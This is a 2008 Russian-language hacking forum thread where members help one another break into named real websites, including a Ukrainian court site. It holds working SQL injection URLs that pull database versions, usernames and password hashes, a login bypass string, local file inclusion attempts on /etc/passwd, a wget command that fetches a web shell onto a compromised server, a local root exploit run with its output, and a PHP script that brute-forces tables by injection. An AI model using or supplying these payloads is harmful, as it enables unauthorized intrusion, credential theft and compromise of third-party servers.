не вводите в заблуждение... не статический , а ВНЕШНИЙ.
иногда зовется выделенным.
не за NATом,
то есть его должно быть видно из инета ))

Jokester
13.05.2008, 22:30
Биндшелл - это когда сервер коннектится к тебя, а не ты к серву
Помоему Вы решили его окончательно запутать :D
Биндшелл-это (грубо) открытый порт на взломаной тачке
Чтобы к нему подрубиться и не спалиться используют putty(он работает с прокси)
Бэкконект это когда взломаная машина подключается к тебе.Используют в основном для обхода фаэров если входящие подключения режутся

criz
13.05.2008, 22:38
Помоему Вы решили его окончательно запутать :D
Биндшелл-это (грубо) открытый порт на взломаной тачке
Чтобы к нему подрубиться и не спалиться используют putty(он работает с прокси)
Бэкконект это когда взломаная машина подключается к тебе.Используют в основном для обхода фаэров если входящие подключения режутся
А я вроде все так и написал:
Бэкконект это когда взломаная машина подключается к тебе.
разве это не то же самое, что я написал:
Биндшелл - это когда сервер коннектится к тебе, а не ты к серву.
?
Под сервом я подразумевал жертву :)

Jokester
13.05.2008, 22:55
2criz нет
Вообще биндшелл это программа которая открывает порт на сервере(жертве)
Она никуда не коннектится просто держит открытый порт(можешь назвать его бекдор), подключаться к порту будешь сам, а что-бы не со своей машины ,через прокси, используют putty

criz
13.05.2008, 23:10
аааа...блин. Все, нашел ошибку. Я не биндшелл хотел написать, а бэкконект :)
Сорри всем :)
З.Ы. надо проспаться

Doom123
13.05.2008, 23:21
залил и выполнил сплоит хотя скомплился он с ошибками=) но чтото произошло до запуска сплоита группы были

uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)

после

uid=0(root) gid=48(apache) groups=48(apache),2523(psaserv)

видимо добавился новый юзер? рут? тогда как его использовать?
сплоит http://milw0rm.com/exploits/4460

гы сорри понел эт я типо рут)

criz
13.05.2008, 23:30
видимо добавился новый юзер? рут?
Не, сплоитом ты повысил права... Тока вот, почему гид не рутовый... Должен был запуститься sh из под рута...

Coder007
15.05.2008, 16:45
Zdrastvyite!Y menia vopros k specialistam po XSS,
http://www.fundacion.telefonica.com/forum/forum_intro.html
est' zdes' XSS ili net?Putaus' poniat' SQL-injection i XSS,
s SQL vrode nichego-ponimau,a XSS ny ochen' tugo:(
Chital stat'ii no princip poniat' ne mogu,obesnite pogaluysta,estesvenno esli est' zgelanie;)

Lesnoy_chelovek
15.05.2008, 16:51
В поле поиска есть пассивная Xss.

Coder007
15.05.2008, 17:00
Thanks!

Gorev
15.05.2008, 22:52
http://www.titan2.ru/press/?page=1&id=-107' это скуль..
http://www.titan2.ru/press/?page=1&id=-107+order+by+1/* а вот это ?

извините если такой вопрос уже был

n0ne
16.05.2008, 00:45
Gorev, http://dev.mysql.com/doc/

Что такое SQL-injection? Это отправка базе данных SQL команды на выполнение через web скрипт, расположенный на доступной рядовому пользователю веб-странице.

http://www.citforum.ru/howto/smart-questions-ru.shtml

lastsmile
16.05.2008, 09:09
http://www.titan2.ru/press/?page=1&id=-107' это скуль..
http://www.titan2.ru/press/?page=1&id=-107+order+by+1/* а вот это ?

извините если такой вопрос уже был

я попробовал язык поменять и айди параметр в конце сделать, кароче вот:

http://www.titan2.ru/press/?page=1&lang=en&id=

а вот что-то дальше никак не получается((

Isis
16.05.2008, 09:56
lastsmile
http://www.titan2.ru/press/?menu=199&page=1&id=107-1+union+select+1111111,2222222,33333333,44444444,5 555555,666666
6 колонок, вывода нет, фильтр /*

neon_fx
16.05.2008, 09:57
Помогите раскрутить
Них не выходит

Вищий Господарський Суд України

http://arbitr.gov.ua/news.php?lang=ukr&sub_section=1&news_id=129'

Gorev
16.05.2008, 12:40
столкнулся с такой проблемой
admin:43e9a4ab75570f5b

Полуночный Хэкер
16.05.2008, 12:46
Gorev, у вас пробелмы? www.narko-net.ru

S00pY
16.05.2008, 13:04
столкнулся с такой проблемой
admin:43e9a4ab75570f5b
admin:admin
Чё тут за проблема-то?

Gorev
16.05.2008, 13:07
admin:admin
Чё тут за проблема-то?
43e9a4ab75570f5b eto je ne MD5?
P.S. ne podhodit pass admin admin

S00pY
16.05.2008, 13:08
admin:admin
Чё тут за проблема-то?
43e9a4ab75570f5b eto je ne MD5?
P.S. ne podhodit pass admin admin
Это Mysql !
Пасс от баззыданных скорее всего а не от админки!

Jokester
16.05.2008, 13:10
http://www.titan2.ru/press/?page=1&id=-107' это скуль..
http://www.titan2.ru/press/?page=1&id=-107+order+by+1/* а вот это ?
извините если такой вопрос уже был


http://www.titan2.ru/press/?menu=199&page=1&id=107-1+union+select+1111111,2222222,33333333,44444444,5 555555,666666
6 колонок, вывода нет, фильтр /*
Помоему 3 ветка, и union'а соответственно нет.Т е подзапросы:
_http://www.titan2.ru/press/?page=1&id=106+and+substring(version(),1,1)=3
_http://www.titan2.ru/press/?menu=199&page=1&id=107+and+substring(version(),1,1)=3

На100ящий
16.05.2008, 14:24
Люди, а есть у кого пхпкод подбора столбцов и колонок в Mysql????? Выложите плз...

Basurman
16.05.2008, 14:50
На100ящий
В избранном прога от SQLHACK
https://forum.antichat.ru/thread24918.html

Gorev
http://www.titan2.ru
version() - 3.23.57
user() - titan@localhost

Ловить тебе там имхо нечего :)

Велемир
16.05.2008, 16:10
Почему нечего? Угадывать и ещё раз угадывать:Р.

Gorev
16.05.2008, 16:12
nu eto esli v printzip postavit' poimet' site..

На100ящий
16.05.2008, 17:12
Basurman,
Она правильно не определяет, нужен простой код пхп...сам писал и не получилось что то.... мож кто подскажет где ошибка???
<?
@set_time_limit(0);
$strverno=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.users+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$strverno,$m);
foreach($m[2] as $s){
}
$fd = fopen("kol.txt", "r");
while(!feof($fd)) {
$ma=trim(fgets($fd));
$str=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.".$ma."+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$str,$p);
foreach($p[2] as $k){
}

if($s==$k){
echo "ok, exist";

}
else {
echo "error";

}
}
fclose($fd);
?>

XaCeRoC
16.05.2008, 20:15
Скажите плиз какзалить шелл имеется доступ к cmd серверн на linux'e , какой запрос составить чтоб закачать шелл http://www.site.com/news.php?cmd=команда для заливки шелла.
За ранее блогадарен:)

desTiny
16.05.2008, 20:19
1)путь = pwd
2)wget /Pпуть http://site.com/shell.txt

Troll
16.05.2008, 21:41
Люди скажите плиз прогу или как вопше мона взломать вордовский фаил!? плиз очень надо! и если прога то дайте ссылку!Плз

neon_fx
16.05.2008, 21:56
Если при вводе запроса
forum=-1+UNION+SELECT+1,CONCAT_WS(char(58),name,pass),3,4 +FROM+users+WHERE+name+NOT+IN+(0x74657374)/*

выдает

?????????:123456789
то с помощью какой функции можно преобразовать ??????
плиз

+toxa+
16.05.2008, 23:00
convert(concat(name,0x3a,pass) using cp1251)

neon_fx
17.05.2008, 00:21
convert(concat(name,0x3a,pass) using cp1251)

непрокатило но дальше я понял что делать +

Sharingan
17.05.2008, 01:06
Есть доступ к БД, есть шелл, нету прав на редактирование, название бд не mysql, что можно сделать, я как вроде искал куда можн оприсабачить линк\ифрейм(тоесть если страница берет из БД что то туда линк или фрейм засунуть) но так и не нашел может что нибуть можно сделать еще?

Дюша
17.05.2008, 01:08
сливай дб декод пасс админа и в адмику... а дальше уже другая история...

1SeTh
17.05.2008, 07:02
при вводе http://www.сайт.com/main.php?id=21&lang=../../../шелл

выдает
Warning: main() [function.include]: Failed opening 'languages/../../../шелл' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/welcome/public_html/main.php on line 11


можно зарулить как это?

Велемир
17.05.2008, 11:02
Что-то сомнительно=).Скорее сможешь читать файлы,которые находятся в папке languages и ниже=).

Велемир
17.05.2008, 11:02
Инклуд возможен обычно, если в main() меняется аргумент, по-твоему желанию(или частично).

1SeTh
17.05.2008, 11:11
то есть забить?

хорошо есть доступ к админке другого сайта, прошел через 1' or '1=1 и пустил меня как админа. Теперь могу редактировать все страницы, пробовал включить пхп скрипт для аплода шелла, тока куда заливается не понятно, вообще не выполняются пхп скрипты. И инклуд тоже не получается.
З.Ы. На гугль или на статьи отправлять не надо уже 3 часа тут ищу и читаю не могу найти решение

n0ne
17.05.2008, 14:04
1SeTh, по поводу админки - попробуй найти заливку файлов и залить шелл, т.к. похоже ты редактируешь html'ные шаблоны, а не сам код страницы, т.е. php выполнить скорее всего не получица.

А по поводу include'а - ты можешь читать любые локальные файлы.

1SeTh
17.05.2008, 14:58
я уже пробовал пхпышный написать в html и если посмотреть на источник страницы то можно увидеть мой код в виде <?php код ?> :confused: , а так на страницу не отображается

а каким образом при помощи инклуда можно получить листинг файлов?

xcedz
17.05.2008, 15:00
я уже пробовал пхпышный написать в html и если посмотреть на источник страницы то можно увидеть мой код в виде <?php код ?> :confused: , а так на страницу не отображается

а каким образом при помощи инклуда можно получить листинг файлов?
пхп код выполняется на строне сервера. или я что то не понял что ты хочешь?

n0ne
17.05.2008, 19:35
1SeTh, никак. Через include можно посмотреть например конфиги, или ещё что-то, что тебя интересует.

1SeTh
17.05.2008, 20:28
пробовал вбить

../../../../../../../etc/httpd/conf/httpd.conf
../../../proc/version

и т.д после lang=
выдает ту же самую ошибку.

n0ne
17.05.2008, 21:22
1SeTh, попробуй etc/passwd. А то что ты указал - не обязательно должно существовать.

1SeTh
17.05.2008, 21:25
да забыл сказать что пробовал etc/passwd на что мне сервер ответил:

Forbidden
You don't have permission to access /main.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


и с этим тоже etc/passwd%00

Ershik
17.05.2008, 21:34
http://welcomearmenia.com/main.php?id=-1+union+select+1/* - скуля

1SeTh
17.05.2008, 22:19
верно, теперь осталось подобрать поля. Пока что кроме названии текущий базы и рута ничего не смог извлечь
ну еще версии

4.1.22-standardwelcomea_aleks@localhostwelcomea_sdays

Велемир
18.05.2008, 00:52
был бы глобальный инклуд.мона было бы подгрузить с сайта шелл.А в локальном инклуде можно выполнить шелл через логи,если повезёт )).ну а в четвёртой версии перебором ток,если нет режима суперотладки:РР.

cheb
18.05.2008, 14:26
вот к примеру иньекция в ипб 1.3 http://www.letov.org/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=1'
каким макаром из нее можно чтото получить?

l-l00K
18.05.2008, 14:30
cheb
Там инъекция после Limit и имеется order by, в таком случае ничего получить не удастся

Basurman
18.05.2008, 14:37
ORDER BY m.name asc
LIMIT 1',30

никаким макаром.

cheb
18.05.2008, 14:38
спасибо за мега шустрый ответ :))))

MaSter GeN
18.05.2008, 18:28
вообшем такая проблема нашел скуль в 2х в разных параметрах на одном сайте в одном есть полные отсчеты обшибках но нет вывода на экран в другом нету отсчета но есть вывод на экран
вотс первый

http://www.revolution.co.uk/_forum.php?neuron=1 union select null,null,null,null,null,null,null,null,null,null, null,null,null from users/*

проходит без ошибок то есть таблица "users" существует ;)
во втором
запрос вида

http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,aes_decrypt(aes_encrypt(version(),0x71), 0x71),3,aes_decrypt(aes_encrypt(user(),0x71), 0x71),aes_decrypt(aes_encrypt(database(),0x71), 0x71),6,7,8,9/*

выдает user,version,database а вот на from userS материться оч интересно почему ?